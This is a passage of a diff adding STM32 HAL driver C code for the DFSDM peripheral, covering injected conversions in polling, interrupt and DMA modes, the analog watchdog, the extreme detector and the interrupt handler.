hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INJECTED_OVERRUN; +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->ErrorCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterErrorCallback(hdfsdm_filter); +#endif + + /* Clear injected overrun flag */ + hdfsdm_filter->Instance->FLTICR = DFSDM_FLTICR_CLRJOVRF; + } + + /* Update remaining injected conversions */ + hdfsdm_filter->InjConvRemaining--; + if(hdfsdm_filter->InjConvRemaining == 0U) + { + /* Update DFSDM filter state only if trigger is software */ + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) + { + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_REG; + } + + /* end of injected sequence, reset the value */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + } + + /* Return function status */ + return HAL_OK; + } +} + +/** + * @brief This function allows to stop injected conversion in polling mode. + * @note This function should be called only if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStop(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_INJ) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop injected conversion */ + DFSDM_InjConvStop(hdfsdm_filter); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start injected conversion in interrupt mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if regular conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStart_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG)) + { + /* Enable interrupts for injected conversions */ + hdfsdm_filter->Instance->FLTCR2 |= (DFSDM_FLTCR2_JEOCIE | DFSDM_FLTCR2_JOVRIE); + + /* Start injected conversion */ + DFSDM_InjConvStart(hdfsdm_filter); + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop injected conversion in interrupt mode. + * @note This function should be called only if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStop_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_INJ) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Disable interrupts for injected conversions */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_JEOCIE | DFSDM_FLTCR2_JOVRIE); + + /* Stop injected conversion */ + DFSDM_InjConvStop(hdfsdm_filter); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start injected conversion in DMA mode. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if regular conversion is ongoing. + * Please note that data on buffer will contain signed injected conversion + * value on 24 most significant bits and corresponding channel on 3 least + * significant bits. + * @param hdfsdm_filter DFSDM filter handle. + * @param pData The destination buffer address. + * @param Length The length of data to be transferred from DFSDM filter to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStart_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + int32_t *pData, + uint32_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check destination address and length */ + if((pData == NULL) || (Length == 0U)) + { + status = HAL_ERROR; + } + /* Check that DMA is enabled for injected conversion */ + else if((hdfsdm_filter->Instance->FLTCR1 & DFSDM_FLTCR1_JDMAEN) != DFSDM_FLTCR1_JDMAEN) + { + status = HAL_ERROR; + } + /* Check parameters compatibility */ + else if((hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->hdmaInj->Init.Mode == DMA_NORMAL) && \ + (Length > hdfsdm_filter->InjConvRemaining)) + { + status = HAL_ERROR; + } + else if((hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->hdmaInj->Init.Mode == DMA_CIRCULAR)) + { + status = HAL_ERROR; + } + /* Check DFSDM filter state */ + else if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG)) + { + /* Set callbacks on DMA handler */ + hdfsdm_filter->hdmaInj->XferCpltCallback = DFSDM_DMAInjectedConvCplt; + hdfsdm_filter->hdmaInj->XferErrorCallback = DFSDM_DMAError; + hdfsdm_filter->hdmaInj->XferHalfCpltCallback = (hdfsdm_filter->hdmaInj->Init.Mode == DMA_CIRCULAR) ?\ + DFSDM_DMAInjectedHalfConvCplt : NULL; + + /* Start DMA in interrupt mode */ + if(HAL_DMA_Start_IT(hdfsdm_filter->hdmaInj, (uint32_t)&hdfsdm_filter->Instance->FLTJDATAR, \ + (uint32_t) pData, Length) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Start injected conversion */ + DFSDM_InjConvStart(hdfsdm_filter); + } + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start injected conversion in DMA mode and to get + * only the 16 most significant bits of conversion. + * @note This function should be called only when DFSDM filter instance is + * in idle state or if regular conversion is ongoing. + * Please note that data on buffer will contain signed 16 most significant + * bits of injected conversion. + * @param hdfsdm_filter DFSDM filter handle. + * @param pData The destination buffer address. + * @param Length The length of data to be transferred from DFSDM filter to memory. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedMsbStart_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + int16_t *pData, + uint32_t Length) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check destination address and length */ + if((pData == NULL) || (Length == 0U)) + { + status = HAL_ERROR; + } + /* Check that DMA is enabled for injected conversion */ + else if((hdfsdm_filter->Instance->FLTCR1 & DFSDM_FLTCR1_JDMAEN) != DFSDM_FLTCR1_JDMAEN) + { + status = HAL_ERROR; + } + /* Check parameters compatibility */ + else if((hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->hdmaInj->Init.Mode == DMA_NORMAL) && \ + (Length > hdfsdm_filter->InjConvRemaining)) + { + status = HAL_ERROR; + } + else if((hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) && \ + (hdfsdm_filter->hdmaInj->Init.Mode == DMA_CIRCULAR)) + { + status = HAL_ERROR; + } + /* Check DFSDM filter state */ + else if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_READY) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG)) + { + /* Set callbacks on DMA handler */ + hdfsdm_filter->hdmaInj->XferCpltCallback = DFSDM_DMAInjectedConvCplt; + hdfsdm_filter->hdmaInj->XferErrorCallback = DFSDM_DMAError; + hdfsdm_filter->hdmaInj->XferHalfCpltCallback = (hdfsdm_filter->hdmaInj->Init.Mode == DMA_CIRCULAR) ?\ + DFSDM_DMAInjectedHalfConvCplt : NULL; + + /* Start DMA in interrupt mode */ + if(HAL_DMA_Start_IT(hdfsdm_filter->hdmaInj, (uint32_t)(&hdfsdm_filter->Instance->FLTJDATAR) + 2U, \ + (uint32_t) pData, Length) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Start injected conversion */ + DFSDM_InjConvStart(hdfsdm_filter); + } + } + else + { + status = HAL_ERROR; + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop injected conversion in DMA mode. + * @note This function should be called only if injected conversion is ongoing. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterInjectedStop_DMA(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_INJ) && \ + (hdfsdm_filter->State != HAL_DFSDM_FILTER_STATE_REG_INJ)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Stop current DMA transfer */ + if(HAL_DMA_Abort(hdfsdm_filter->hdmaInj) != HAL_OK) + { + /* Set DFSDM filter in error state */ + hdfsdm_filter->State = HAL_DFSDM_FILTER_STATE_ERROR; + status = HAL_ERROR; + } + else + { + /* Stop regular conversion */ + DFSDM_InjConvStop(hdfsdm_filter); + } + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to get injected conversion value. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Corresponding channel of injected conversion. + * @retval Injected conversion value + */ +int32_t HAL_DFSDM_FilterGetInjectedValue(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t *Channel) +{ + uint32_t reg = 0U; + int32_t value = 0; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(Channel != NULL); + + /* Get value of data register for injected channel */ + reg = hdfsdm_filter->Instance->FLTJDATAR; + + /* Extract channel and injected conversion value */ + *Channel = (reg & DFSDM_FLTJDATAR_JDATACH); + value = ((int32_t)(reg & DFSDM_FLTJDATAR_JDATA) >> DFSDM_FLTJDATAR_JDATA_Pos); + + /* return regular conversion value */ + return value; +} + +/** + * @brief This function allows to start filter analog watchdog in interrupt mode. + * @param hdfsdm_filter DFSDM filter handle. + * @param awdParam DFSDM filter analog watchdog parameters. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterAwdStart_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + DFSDM_Filter_AwdParamTypeDef *awdParam) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(IS_DFSDM_FILTER_AWD_DATA_SOURCE(awdParam->DataSource)); + assert_param(IS_DFSDM_INJECTED_CHANNEL(awdParam->Channel)); + assert_param(IS_DFSDM_FILTER_AWD_THRESHOLD(awdParam->HighThreshold)); + assert_param(IS_DFSDM_FILTER_AWD_THRESHOLD(awdParam->LowThreshold)); + assert_param(IS_DFSDM_BREAK_SIGNALS(awdParam->HighBreakSignal)); + assert_param(IS_DFSDM_BREAK_SIGNALS(awdParam->LowBreakSignal)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_RESET) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Set analog watchdog data source */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_AWFSEL); + hdfsdm_filter->Instance->FLTCR1 |= awdParam->DataSource; + + /* Set thresholds and break signals */ + hdfsdm_filter->Instance->FLTAWHTR &= ~(DFSDM_FLTAWHTR_AWHT | DFSDM_FLTAWHTR_BKAWH); + hdfsdm_filter->Instance->FLTAWHTR |= (((uint32_t) awdParam->HighThreshold << DFSDM_FLTAWHTR_AWHT_Pos) | \ + awdParam->HighBreakSignal); + hdfsdm_filter->Instance->FLTAWLTR &= ~(DFSDM_FLTAWLTR_AWLT | DFSDM_FLTAWLTR_BKAWL); + hdfsdm_filter->Instance->FLTAWLTR |= (((uint32_t) awdParam->LowThreshold << DFSDM_FLTAWLTR_AWLT_Pos) | \ + awdParam->LowBreakSignal); + + /* Set channels and interrupt for analog watchdog */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_AWDCH); + hdfsdm_filter->Instance->FLTCR2 |= (((awdParam->Channel & DFSDM_LSB_MASK) << DFSDM_FLTCR2_AWDCH_Pos) | \ + DFSDM_FLTCR2_AWDIE); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop filter analog watchdog in interrupt mode. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterAwdStop_IT(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_RESET) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Reset channels for analog watchdog and deactivate interrupt */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_AWDCH | DFSDM_FLTCR2_AWDIE); + + /* Clear all analog watchdog flags */ + hdfsdm_filter->Instance->FLTAWCFR = (DFSDM_FLTAWCFR_CLRAWHTF | DFSDM_FLTAWCFR_CLRAWLTF); + + /* Reset thresholds and break signals */ + hdfsdm_filter->Instance->FLTAWHTR &= ~(DFSDM_FLTAWHTR_AWHT | DFSDM_FLTAWHTR_BKAWH); + hdfsdm_filter->Instance->FLTAWLTR &= ~(DFSDM_FLTAWLTR_AWLT | DFSDM_FLTAWLTR_BKAWL); + + /* Reset analog watchdog data source */ + hdfsdm_filter->Instance->FLTCR1 &= ~(DFSDM_FLTCR1_AWFSEL); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to start extreme detector feature. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Channels where extreme detector is enabled. + * This parameter can be a values combination of @ref DFSDM_Channel_Selection. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterExdStart(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t Channel) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(IS_DFSDM_INJECTED_CHANNEL(Channel)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_RESET) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Set channels for extreme detector */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_EXCH); + hdfsdm_filter->Instance->FLTCR2 |= ((Channel & DFSDM_LSB_MASK) << DFSDM_FLTCR2_EXCH_Pos); + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to stop extreme detector feature. + * @param hdfsdm_filter DFSDM filter handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DFSDM_FilterExdStop(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + HAL_StatusTypeDef status = HAL_OK; + __IO uint32_t reg1; + __IO uint32_t reg2; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Check DFSDM filter state */ + if((hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_RESET) || \ + (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_ERROR)) + { + /* Return error status */ + status = HAL_ERROR; + } + else + { + /* Reset channels for extreme detector */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_EXCH); + + /* Clear extreme detector values */ + reg1 = hdfsdm_filter->Instance->FLTEXMAX; + reg2 = hdfsdm_filter->Instance->FLTEXMIN; + UNUSED(reg1); /* To avoid GCC warning */ + UNUSED(reg2); /* To avoid GCC warning */ + } + /* Return function status */ + return status; +} + +/** + * @brief This function allows to get extreme detector maximum value. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Corresponding channel. + * @retval Extreme detector maximum value + * This value is between Min_Data = -8388608 and Max_Data = 8388607. + */ +int32_t HAL_DFSDM_FilterGetExdMaxValue(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t *Channel) +{ + uint32_t reg = 0U; + int32_t value = 0; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(Channel != NULL); + + /* Get value of extreme detector maximum register */ + reg = hdfsdm_filter->Instance->FLTEXMAX; + + /* Extract channel and extreme detector maximum value */ + *Channel = (reg & DFSDM_FLTEXMAX_EXMAXCH); + value = ((int32_t)(reg & DFSDM_FLTEXMAX_EXMAX) >> DFSDM_FLTEXMAX_EXMAX_Pos); + + /* return extreme detector maximum value */ + return value; +} + +/** + * @brief This function allows to get extreme detector minimum value. + * @param hdfsdm_filter DFSDM filter handle. + * @param Channel Corresponding channel. + * @retval Extreme detector minimum value + * This value is between Min_Data = -8388608 and Max_Data = 8388607. + */ +int32_t HAL_DFSDM_FilterGetExdMinValue(DFSDM_Filter_HandleTypeDef *hdfsdm_filter, + uint32_t *Channel) +{ + uint32_t reg = 0U; + int32_t value = 0; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + assert_param(Channel != NULL); + + /* Get value of extreme detector minimum register */ + reg = hdfsdm_filter->Instance->FLTEXMIN; + + /* Extract channel and extreme detector minimum value */ + *Channel = (reg & DFSDM_FLTEXMIN_EXMINCH); + value = ((int32_t)(reg & DFSDM_FLTEXMIN_EXMIN) >> DFSDM_FLTEXMIN_EXMIN_Pos); + + /* return extreme detector minimum value */ + return value; +} + +/** + * @brief This function allows to get conversion time value. + * @param hdfsdm_filter DFSDM filter handle. + * @retval Conversion time value + * @note To get time in second, this value has to be divided by DFSDM clock frequency. + */ +uint32_t HAL_DFSDM_FilterGetConvTimeValue(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + uint32_t reg = 0U; + uint32_t value = 0U; + + /* Check parameters */ + assert_param(IS_DFSDM_FILTER_ALL_INSTANCE(hdfsdm_filter->Instance)); + + /* Get value of conversion timer register */ + reg = hdfsdm_filter->Instance->FLTCNVTIMR; + + /* Extract conversion time value */ + value = ((reg & DFSDM_FLTCNVTIMR_CNVCNT) >> DFSDM_FLTCNVTIMR_CNVCNT_Pos); + + /* return extreme detector minimum value */ + return value; +} + +/** + * @brief This function handles the DFSDM interrupts. + * @param hdfsdm_filter DFSDM filter handle. + * @retval None + */ +void HAL_DFSDM_IRQHandler(DFSDM_Filter_HandleTypeDef *hdfsdm_filter) +{ + /* Check if overrun occurs during regular conversion */ + if(((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_ROVRF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_ROVRIE) != 0U)) + { + /* Clear regular overrun flag */ + hdfsdm_filter->Instance->FLTICR = DFSDM_FLTICR_CLRROVRF; + + /* Update error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_REGULAR_OVERRUN; + + /* Call error callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->ErrorCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterErrorCallback(hdfsdm_filter); +#endif + } + /* Check if overrun occurs during injected conversion */ + else if(((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_JOVRF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_JOVRIE) != 0U)) + { + /* Clear injected overrun flag */ + hdfsdm_filter->Instance->FLTICR = DFSDM_FLTICR_CLRJOVRF; + + /* Update error code */ + hdfsdm_filter->ErrorCode = DFSDM_FILTER_ERROR_INJECTED_OVERRUN; + + /* Call error callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->ErrorCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterErrorCallback(hdfsdm_filter); +#endif + } + /* Check if end of regular conversion */ + else if(((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_REOCF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_REOCIE) != 0U)) + { + /* Call regular conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->RegConvCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterRegConvCpltCallback(hdfsdm_filter); +#endif + + /* End of conversion if mode is not continuous and software trigger */ + if((hdfsdm_filter->RegularContMode == DFSDM_CONTINUOUS_CONV_OFF) && \ + (hdfsdm_filter->RegularTrigger == DFSDM_FILTER_SW_TRIGGER)) + { + /* Disable interrupts for regular conversions */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_REOCIE); + + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_REG) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_INJ; + } + } + /* Check if end of injected conversion */ + else if(((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_JEOCF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_JEOCIE) != 0U)) + { + /* Call injected conversion complete callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->InjConvCpltCallback(hdfsdm_filter); +#else + HAL_DFSDM_FilterInjConvCpltCallback(hdfsdm_filter); +#endif + + /* Update remaining injected conversions */ + hdfsdm_filter->InjConvRemaining--; + if(hdfsdm_filter->InjConvRemaining == 0U) + { + /* End of conversion if trigger is software */ + if(hdfsdm_filter->InjectedTrigger == DFSDM_FILTER_SW_TRIGGER) + { + /* Disable interrupts for injected conversions */ + hdfsdm_filter->Instance->FLTCR2 &= ~(DFSDM_FLTCR2_JEOCIE); + + /* Update DFSDM filter state */ + hdfsdm_filter->State = (hdfsdm_filter->State == HAL_DFSDM_FILTER_STATE_INJ) ? \ + HAL_DFSDM_FILTER_STATE_READY : HAL_DFSDM_FILTER_STATE_REG; + } + /* end of injected sequence, reset the value */ + hdfsdm_filter->InjConvRemaining = (hdfsdm_filter->InjectedScanMode == ENABLE) ? \ + hdfsdm_filter->InjectedChannelsNbr : 1U; + } + } + /* Check if analog watchdog occurs */ + else if(((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_AWDF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_AWDIE) != 0U)) + { + uint32_t reg = 0U; + uint32_t threshold = 0U; + uint32_t channel = 0U; + + /* Get channel and threshold */ + reg = hdfsdm_filter->Instance->FLTAWSR; + threshold = ((reg & DFSDM_FLTAWSR_AWLTF) != 0U) ? DFSDM_AWD_LOW_THRESHOLD : DFSDM_AWD_HIGH_THRESHOLD; + if(threshold == DFSDM_AWD_HIGH_THRESHOLD) + { + reg = reg >> DFSDM_FLTAWSR_AWHTF_Pos; + } + while((reg & 1U) == 0U) + { + channel++; + reg = reg >> 1U; + } + /* Clear analog watchdog flag */ + hdfsdm_filter->Instance->FLTAWCFR = (threshold == DFSDM_AWD_HIGH_THRESHOLD) ? \ + (1U << (DFSDM_FLTAWSR_AWHTF_Pos + channel)) : \ + (1U << channel); + + /* Call analog watchdog callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + hdfsdm_filter->AwdCallback(hdfsdm_filter, channel, threshold); +#else + HAL_DFSDM_FilterAwdCallback(hdfsdm_filter, channel, threshold); +#endif + } + /* Check if clock absence occurs */ + else if((hdfsdm_filter->Instance == DFSDM1_Filter0) && \ + ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_CKABF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_CKABIE) != 0U)) + { + uint32_t reg = 0U; + uint32_t channel = 0U; + + reg = ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_CKABF) >> DFSDM_FLTISR_CKABF_Pos); + + while(channel < DFSDM1_CHANNEL_NUMBER) + { + /* Check if flag is set and corresponding channel is enabled */ + if(((reg & 1U) != 0U) && (a_dfsdm1ChannelHandle[channel] != NULL)) + { + /* Check clock absence has been enabled for this channel */ + if((a_dfsdm1ChannelHandle[channel]->Instance->CHCFGR1 & DFSDM_CHCFGR1_CKABEN) != 0U) + { + /* Clear clock absence flag */ + hdfsdm_filter->Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Call clock absence callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + a_dfsdm1ChannelHandle[channel]->CkabCallback(a_dfsdm1ChannelHandle[channel]); +#else + HAL_DFSDM_ChannelCkabCallback(a_dfsdm1ChannelHandle[channel]); +#endif + } + } + channel++; + reg = reg >> 1U; + } + } +#if defined (DFSDM2_Channel0) + /* Check if clock absence occurs */ + else if((hdfsdm_filter->Instance == DFSDM2_Filter0) && \ + ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_CKABF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_CKABIE) != 0U)) + { + uint32_t reg = 0U; + uint32_t channel = 0U; + + reg = ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_CKABF) >> DFSDM_FLTISR_CKABF_Pos); + + while(channel < DFSDM2_CHANNEL_NUMBER) + { + /* Check if flag is set and corresponding channel is enabled */ + if(((reg & 1U) != 0U) && (a_dfsdm2ChannelHandle[channel] != NULL)) + { + /* Check clock absence has been enabled for this channel */ + if((a_dfsdm2ChannelHandle[channel]->Instance->CHCFGR1 & DFSDM_CHCFGR1_CKABEN) != 0U) + { + /* Clear clock absence flag */ + hdfsdm_filter->Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRCKABF_Pos + channel)); + + /* Call clock absence callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + a_dfsdm2ChannelHandle[channel]->CkabCallback(a_dfsdm2ChannelHandle[channel]); +#else + HAL_DFSDM_ChannelCkabCallback(a_dfsdm2ChannelHandle[channel]); +#endif + } + } + channel++; + reg = reg >> 1U; + } + } +#endif /* DFSDM2_Channel0 */ + /* Check if short circuit detection occurs */ + else if((hdfsdm_filter->Instance == DFSDM1_Filter0) && \ + ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_SCDF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_SCDIE) != 0U)) + { + uint32_t reg = 0U; + uint32_t channel = 0U; + + /* Get channel */ + reg = ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_SCDF) >> DFSDM_FLTISR_SCDF_Pos); + while((reg & 1U) == 0U) + { + channel++; + reg = reg >> 1U; + } + + /* Clear short circuit detection flag */ + hdfsdm_filter->Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); + + /* Call short circuit detection callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + a_dfsdm1ChannelHandle[channel]->ScdCallback(a_dfsdm1ChannelHandle[channel]); +#else + HAL_DFSDM_ChannelScdCallback(a_dfsdm1ChannelHandle[channel]); +#endif + } +#if defined (DFSDM2_Channel0) + /* Check if short circuit detection occurs */ + else if((hdfsdm_filter->Instance == DFSDM2_Filter0) && \ + ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_SCDF) != 0U) && \ + ((hdfsdm_filter->Instance->FLTCR2 & DFSDM_FLTCR2_SCDIE) != 0U)) + { + uint32_t reg = 0U; + uint32_t channel = 0U; + + /* Get channel */ + reg = ((hdfsdm_filter->Instance->FLTISR & DFSDM_FLTISR_SCDF) >> DFSDM_FLTISR_SCDF_Pos); + while((reg & 1U) == 0U) + { + channel++; + reg = reg >> 1U; + } + + /* Clear short circuit detection flag */ + hdfsdm_filter->Instance->FLTICR = (1U << (DFSDM_FLTICR_CLRSCDF_Pos + channel)); + + /* Call short circuit detection callback */ +#if (USE_HAL_DFSDM_REGISTER_CALLBACKS == 1) + a_dfsdm2ChannelHandle[channel]->ScdCallback(a_dfsdm2ChannelHandle[channel]); +#else + HAL_DFSDM_ChannelScdCallback(a_dfsdm2ChannelHandle[channel]); +#endif + } +#endif /* DFSDM2_Channel0 */ +} + +/** 